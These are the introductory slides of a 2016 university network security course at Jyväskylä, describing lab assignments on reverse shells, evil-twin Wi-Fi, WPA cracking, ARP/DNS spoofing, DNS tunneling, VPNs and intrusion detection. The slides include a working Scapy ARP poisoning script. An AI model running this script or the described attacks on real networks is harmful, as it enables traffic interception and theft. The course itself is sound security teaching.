ties327 network security (3-5 ects) autumn 2016users.jyu.fi/~timoh/ties327/start2016.pdf · ties327...

UNIVERSITY OF JYVÄSKYLÄ

TIES327 – Network Security (3-5 ECTS)

Autumn 2016

Prof. Timo Hämäläinen [email protected]

Department of Mathematical Information Technology

IT Faculty

University of Jyväskylä

mailto:[email protected]

mailto:[email protected]


Important note!

If you have completed the "old course" TIES326 in year

2012 or 2013, you will not get credits from this

TIES327, as its' content has about 30% similar

assignments as TIES326 has in 2012 and 2013.

Those students who has completed TIES326 before

2012, has possibility to get credits from TIES327.


Goals of the course

Students understand what the term "security" keep

inside in particular in the networks and services point of view

... get familiar with the different security aspects and to

understand the necessary terms

…are cabable to apply the various tools in auditing and protecting

against network attacks

... learn to look for a new knowledge about this area

The feeling of safety can not to be ignorance !

The course focuses on hands-on making of the security issues

and learning different networking security exercises by self-doing

Remember: Use of the presented methods are illegal in the public

networks ! They’ll put you in a jail cell...


Prerequisites

Basic knowledge about networks, TCP/IP- protocols

and programming

For example courses (or similar knowledge)

ITKP101- Tietokone ja tietoverkot työvälineenä

ITKP104 – Tietoverkot

ITKP102 - Ohjelmointi 1


How to complete course ?

Complete assignments

Group of 1-3 students

You should get at least 50% of total points and at least the same 50% of the each

assignments. Answer in depth to the all questions presented in the assignments in

order to get the course completed.

We really encourage you to install and complete these exercises with your own

devices. If it is not possible, send email to me and ask time to the our lab and

complete those there. If you're coming to the lab, read assignment carefully and

answer to the preliminary questions before coming.

The course can be completed 3-5 ECTS wide

3 ECTS fulfilment: complete assignments 1-3

4 ECTS fulfilment: complete assignments 1-4

5 ECTS fulfilment complete all 5 assignments


1. Virtual Network Configuration and Introduction

into Kali Linux

• In this first assignment, you will create and configure virtual network which will be

used for testing different kinds of network attacks.

• To do this you need an PC with at least 8 GB of RAM (bigger is of course better!).

• We are using Ubuntu 16.04 in host machine, but it is of course possible to make

the same virtual network configuration, if you have Windows or Mac OS by using

corresponding commands.

• https://www.virtualbox.org/

About the assignments


1.1 Virtual Network Configuration


1.2 Pentesting with Kali http://www.kali.org/

From the creators of BackTrack comes Kali Linux, the most advanced and

versatile penetration testing distribution ever created. BackTrack has grown far

beyond its humble roots as a live CD and has now become a full-fledged

operating system

https://www.kali.org/penetration-testing-with-kali-linux/

In this assignment you are going to get familiar with some tools available at Kali.

It is intended to build your basic skills and get you familiar with the Kali properties

like:

• Port scanning

• Finding security exploits

• SQL injection

• Password brute-forcing

• Denial-of-Service attack

• etc.

Kali tools: http://tools.kali.org/tools-listing

http://www.kali.org/

















http://tools.kali.org/tools-listing











2. Attacks from the Outside and Wi-Fi Security

Cracking

2.1 Reverse TCP attacks

In this tutorial, we get familiar with one dangerous attack as reverse TCP

connection. A firewall usually blocks open ports, but does not block outgoing

traffic, therefore a reverse connection is used to bypass firewall and router

security restrictions.

For example, a Trojan horse running on a computer behind a firewall that blocks

incoming connections can easily open an outbound connection to a remote host

on the Internet. Once the connection is established, the remote host can send

commands to the Trojan horse. Trojan horses that use a reverse connection

usually send SYN (TCP) packets to the attacker's IP address. The attacker listens

for these SYN packets and accepts the desired connections.

It will be shown how to establish reverse TCP connection between a client and the

external attacker with Kali Linux 2016.2 installed on it.


2.2 Wi-Fi "evil twin" attack

In this tutorial, the attacker is supposed to have two network interfaces. For

example, you can have two wireless interfaces or one wireless and one wire

interface. We also assume that you install Kali Linux 2016.2 on the attacker

machine. Your Wi-Fi router must support WPA encryption. Interface "eth0“ is used

to connect the attacker to the Internet, whereas "wlan0" will be used to create "evil

twin" access point.

It is worth to notice that this tutorial and next one should be done by using real

devices not the virtual network you configured earlier.

The attack presented in this tutorial is not classical "evil twin" attack, in which the

client automatically connects to the "evil" access point after being forced to

disconnect from the legitimate one.

In our case, the attack is more a phishing attempt combined with some simple

DDoS attack against the legitimate access point. This attack might take place in

public places, such as big hotels or airports, where several access points have the

same name, and when a client cannot connect to a legitimate access point, he

might try to connect to the "evil" one without paying attention to the fact that it is

unencrypted. In this tutorial, the attack is performed by using such applications as

Aircrack, Mdk3 and Iptables.


2.3 WPA encryption cracking by dictionary attack

This tutorial explains how to crack wireless networks encrypted with WPA by using

dictionary attacks. For this tutorial, you are supposed to have two laptops with

wireless interfaces (or one laptop and one smartphone) and wireless access point,

e.g. WiFi router. One of the laptops will be used as a client and another one as an

attacker. In this tutorial, we assume that you install Kali Linux on the attacker

machine. WiFi router must support WPA encryption.

Despite the fact, that pure brute force is not effective for the cracking of the WPA

encryption mode, attackers are able to crack it with the help of different dictionary

attacks. In this tutorial, this type of the attack is demonstrated by using different

Kali applications: Aircrack, Cowpatty, John The Ripper and Hashcat.


3. Attacks from the Inside and Man-In-The-Middle

Attacks

3.1 ARP poisoning, DNS and DHCP spoofing

ARP poisoning is also known as ARP Spoofing, ARP Flooding and ARP Poisoning

Routing. So what basically is ARP poisoning ?

It is technique which allows an attacker sniffs traffic from LAN, monitors it and even

stop it. ARP poisoning is done by sending fake or spoofed messages to an Ethernet

LAN card. By doing so an attacker manages to associate its MAC address with IP

address of another node on network

(which is basically default gateway’s IP). Then the traffic meant for gateway first goes

to attacker and then to gateway thus allowing attacker to sniff traffic from network.


3.1 DNS and DHCP spoofing

• The Domain Name System translates names that human can understand to IP addresses.

First, the client sends DNS query and the DNS server responds with DNS response. The DNS

query and response have identical ID number and query. Then the client updates its DNS

cache entries accordingly domain name and IP address. Assume that the attacker wants to

change the clients DNS cache so that traffic from client to the domain web.seclab,jyu.fi. will be

redirected to the attackers server 192.168.1.102.

• For this purpose the attacker sniffs DNS queries from the client and waits for DNS query with

the relevant query, then the attacker spoofs a DNS response e.g. with the attacker's IP. Client

updates its DNS cache and therefore all traffic goes to the attacker. Attacker repeats to spoof

DNS responses to maintain a valid cache. However DNS query eventually arrives the DNS

server and the server will respond with a legitimate DNS response. When the client gets the

legitimate response, it will update its cache. For this reason, ARP poisoning of the client

should be done before DNS spoofing. In this section, we show how to spoof the DNS server.

• The DHCP (Dynamic Host Configuration Protocol) is used to configure network settings to

hosts on IP networks. DHCP allows hosts to be dynamically configured with IP address,

subnet mask, gateway address and DNS server address. It works as follows: first, the client

sends (broadcasts) DHCP discover containing transaction ID. The DHCP server responds

with DHCP offer which contains the same transaction ID. The client then sends DHCP request

and the DHCP server responds with DHCP Ack. When the attacker applying DHCP spoofing

attack an attacker waits for DHCP discover request from the client. After getting this request

the attacker spoofs a DHCP offer with assigning malicious gateway or/and DNS server. After

that the client responds with DHCP request and the attacker spoofs a DHCP Ack as well.

Finally, the client updates its DNS server and gateway addresses. However, when DHCP

discover arrives the DHCP server this server responds to the client with a legitimate DHCP

offer. If the client gets the legitimate offer first then DHCP spoofing will not work. For this

reason, the attacker DoS the DHCP server during the attack so as DHCP server can not

respond to clients.


3.2 HTTP content modification and attack against the bank user

Once an attacker has been located in the middle between his victim and

other network nodes, he can easily change HTTP requests and

responses which go through him. In this section, the attacker changes

web pages which the victim requested from a web site to make the victim

feel nervous. For this attack, the attacker first spoofs ARP cache of the

victim in order to be "in the middle". Then, when the victim requests a

web page, he modifies content (pictures etc.) contained on the page and

sends the result to the victim.


3.3 DNS tunneling attack

With DNS tunneling, another protocol can be tunneled through DNS. For

tunneling to work, a client-server model is used. The client is typically

behind the organization's security controls and the server is located

somewhere on the Internet. The DNS communications between the client

and server occur over the organization's own DNS infrastructure and any

other public DNS servers. Since this is a client-server model, any type of

traffic can be sent over the tunnel. Some tunnel applications even

provide encryption.

In this tutorial, we consider the following scenario. The malicious actor

manages to compromise a host in our LAN network by social engineering

and install the DNS tunnel client software. DNS tunnel client is

configured to use the LAN internal DNS server (192.168.1.2). The

internal DNS server forwards non-cached requests an upstream/public

DNS server (192.168.1.1). Our external attacker installs and configures

DNS tunnel server on his machine. We next assume, that the external

attacker has a registered domain name, and, therefore, all the DNS

requests are forwarded to the DNS tunnel server. The malicious actor is

then able to send data back and forth between the client and server.


4. Public-Key Cryptography

4.1 Configuring VPN connection with the help of OpenVPN

This tutorial explains how to configure simple OpenVPN server and client, set

up your own Certificate Authority (CA), generate keys and sign certificates.

In addition, it shortly describes dual-factor authentication based on

username and password, which are used by the server for authenticating a

connecting client.

OpenVPN is a full-featured SSL VPN which implements secure network

extension using the industry standard SSL/TLS protocol, supports exible

client authentication methods based on certicates, smart cards, and/or

username/password credentials, and allows user or group-specic access

control policies using firewall rules applied to the VPN virtual interface.


4.2 Public-key cryptography with GPG

This tutorial explains how to configure Public Key Infrastructure (PKI), encrypt files and sign emails by

using GNU Privacy Guard (GPG).

• Public-key cryptography allows you to communicate with someone securely without exchanging a

secret password first. With public-key encryption, instead of sharing a password, each party

generates a "keypair“ consisting of a "public" key and a "secret/private" key.

• Each party can then publish their "public" key to the world or send it directly to the other party,

while keeping their secret key private and safe. If you have Person's public key, you can do a few

things with it:

• Encrypt a message that only that Person can decrypt (they need their secret key to decrypt

it).

• Validate that Person signed a message with their secret key. This also lets you verify

strongly that the message was not corrupted nor modified in transmission.

• With your secret key, you can do following things:

• Decrypt messages encrypted with your public key.

• Sign messages that others can verify came from you (they need your public key to verify the

signature).

• This assignment explains how to configure and use Public Key Infrastructure (PKI), encrypt les

and sign emails by using GNU Privacy Guard (GPG).

• The GNU privacy guard is the GNU project's complete and free implementation of the OpenPGP

standard as defined by RFC4880. GPG allows to encrypt and sign your data and communication,

features a versatile key management system as well as access modules for all kinds of public key

directories


5. Signature-Based and Anomaly-Based Intrusion

Detection

5.1 Signature-based intrusion detection

Nowadays, due to the exponentially growing number of network attacks

intrusion detection has become an important area of research. In this

tutorial, we get familiar with the signature-based approach of intrusion

detection. First, we analyze a small pcap- file which contains network traffic

sent to a web service during two hours. Most of the traffic stored in this le is

legitimate, but there is also intrusive traffic that we try to find by applying a

signature-based detection approach that relies on the analysis of payload of

network packets. After that, we get familiar with Snort, that is a free and

open source network intrusion detection and prevention system.


5.1 Payload-based and header-based intrusion detection

The recent rise in the amount of traffic and the increase in line speed put a

heavy computational load and resource consumption on such traditional

payload-based IDSs. Compared to payload-based intrusion detection, the

analysis of information in packet headers handles a considerably lower

amount of data. However, since header measurements provide only an

aggregated view of the data transferred over the network, they cannot reach

the accuracy of the payload-based approach. Thus, a header-based IDS is

not supposed to substitute completely a payload-based system, but can be

used along with it to allow early detection in environments in which payload-

based inspection is not scalable.

In this section, we analyze information contained in packet header and

apply an anomaly-based detection approach. Such approach searches for a

sample that deviates significantly from the expected behavior and classifies

such sample as an anomaly. In this tutorial, we calculate a sample entropy

of different parameters extracted from packet headers to find network

anomalies.


Tools used in assignments

Kali Linux: http://www.kail.org/


Scapy: http://secdev.org/projects/scapy/

Wireshark: http://www.wireshark.org/

pfSense: http://www.pfsense.org/

OpenVPN: https://openvpn.net/

GNU Privacy Guard (GPG): https://www.gnupg.org/

Snort: http://www.snort.org/

http://www.kail.org/










http://secdev.org/projects/scapy/

http://www.wireshark.org/

http://www.pfsense.org/

https://openvpn.net/

https://www.gnupg.org/

http://www.snort.org/


An example: ARPpoisoning.py from scapy.all import *

from time import sleep

import threading

import os, sys

class SpoofThread (threading.Thread):

def __init__(self, victim, gateway):

self.packet = ARP()

self.packet.psrc = gateway

self.packet.pdst = victim

threading.Thread.__init__(self)

def run (self):

counter = 0

print "spoofing " + str(self.packet.pdst) + " every 5 seconds..."

try:

while 1:

send(self.packet, verbose=0);

counter += 1

print 'poison #' + str(counter)

sleep(5);

except Exception as e:

print type(e)

print e.args

print e

pass

if __name__ == '__main__':

if len(sys.argv) != 3:

sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128

192.168.72.2' % os.path.basename(__file__))

targets_dest_ips = [sys.argv[1]]

spoofed_src_ip = [sys.argv[2]]

for ip in targets_dest_ips:

SpoofThread(ip, spoofed_src_ip).start()

http://users.jyu.fi/~mizolotu/download.php?file=files/ArpPoisoning.py


Course grading

3ECTS Total points (max. 45p.) 4ECTS Total points (max. 60p.) 5ECTS Total points (max. 70p.) GRADE

43 58 67 5

38 51 61 4

33 44 54 3

28 37 45 2

23 30 35 1

Work load:

Ca. 100-120 hours, consisting of some lectures, main

task to complete assignments xx hours (of course

depending on your background skills).


About the lectures

The lectures are intended to provide introduction to the different

networking security topics and examples

The course focuses on hands-on making of the security issues and

learning by doing (not learning by listening !!).

Some literature:

• Lot of research papers

• - IEEE Explore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp

- ACM, http://portal.acm.org/dl.cfm

- Google scholar, http://scholar.google.com/

– http://site.ebrary.com/lib/jyvaskyla

• Introduction to Network Security

• Hacking Exposed Web 2.0 : Web 2.0 Security Secrets and

Solutions

• CEH : Certified Ethical Hacker Study Guide

https://email.jyu.fi/OWA/redir.aspx?C=7ztVM3r8HUSjb1WmtbDjyYt8sZTOqNAIgNFS--wqt4y9LNInPX_CfaJzJClTK2TslP4SkbZMML8.&URL=http%3a%2f%2fieeexplore.ieee.org%2fXplore%2fdynhome.jsp

https://email.jyu.fi/OWA/redir.aspx?C=7ztVM3r8HUSjb1WmtbDjyYt8sZTOqNAIgNFS--wqt4y9LNInPX_CfaJzJClTK2TslP4SkbZMML8.&URL=http%3a%2f%2fportal.acm.org%2fdl.cfm

http://scholar.google.com/

http://site.ebrary.com/lib/jyvaskyla

http://site.ebrary.com/lib/jyvaskyla

http://site.ebrary.com/lib/jyvaskyla/docDetail.action?docID=10228225&p00=network+security

http://site.ebrary.com/lib/jyvaskyla/docDetail.action?docID=10210098&p00=hacking




L1: Introduction to the network security

What is security and what are the goals

Threats of networks and IT- systems

Security policies

Risk calculation

Security offenses

Social Engineering

Phishing

Legislation


L2: Protecting your networked services (visiting lecture

by Tapio Väärämäki, Exclusive Networks Finland)

CARM – Cyber Attack Remediation and Mitigation

UTM (Unified Threat Management)

NGFW (Next Generation Firewall)

WAF (Web Application Firewall)

Database Security

File Security

Endpoint Security


L3: Auditing networking security (visiting lecture by

Matti Kannela)

Information security as a concept

Technical security vs. processes / controls / humans.

Examples and cases ’from the field’.

How to create solid IS fundamentals and standards?

Why bad things happen and how to prevent them?

Change management explained


L4: Monitoring and analysing the nework data

Normal netwok behaviour

Anomality detection

How to gather data

Pre-processing and analysing the data


L5: Security Issues for 4/5G Cellular Networks, IoT

Cellural networks security issues (PHY/MAC layers)

Different security threats

User Identity

Femtocells

Interoperability

RRC signalling

Other threats

Being an all-IP networks makes the system vulnerable

against IP attacks, such DoS over the public IP addresses of the core

network interfaces, traffic

eavesdropping and injection attacks.

IoT security issues


Some links

https://www.viestintavirasto.fi/kyberturvallisuus.html

http://www.iltasanomat.fi/digitoday/tietoturva/

Vulnerabilities

http://www.securityfocus.com

Advanced Persistent Threat

https://www.secureworks.com/capabilities/threat-

intelligence/advanced-threats

http://www.securityfocus.com/




ties327 network security (3-5 ects) autumn 2016users.jyu.fi/~timoh/ties327/start2016.pdf · ties327...

Documents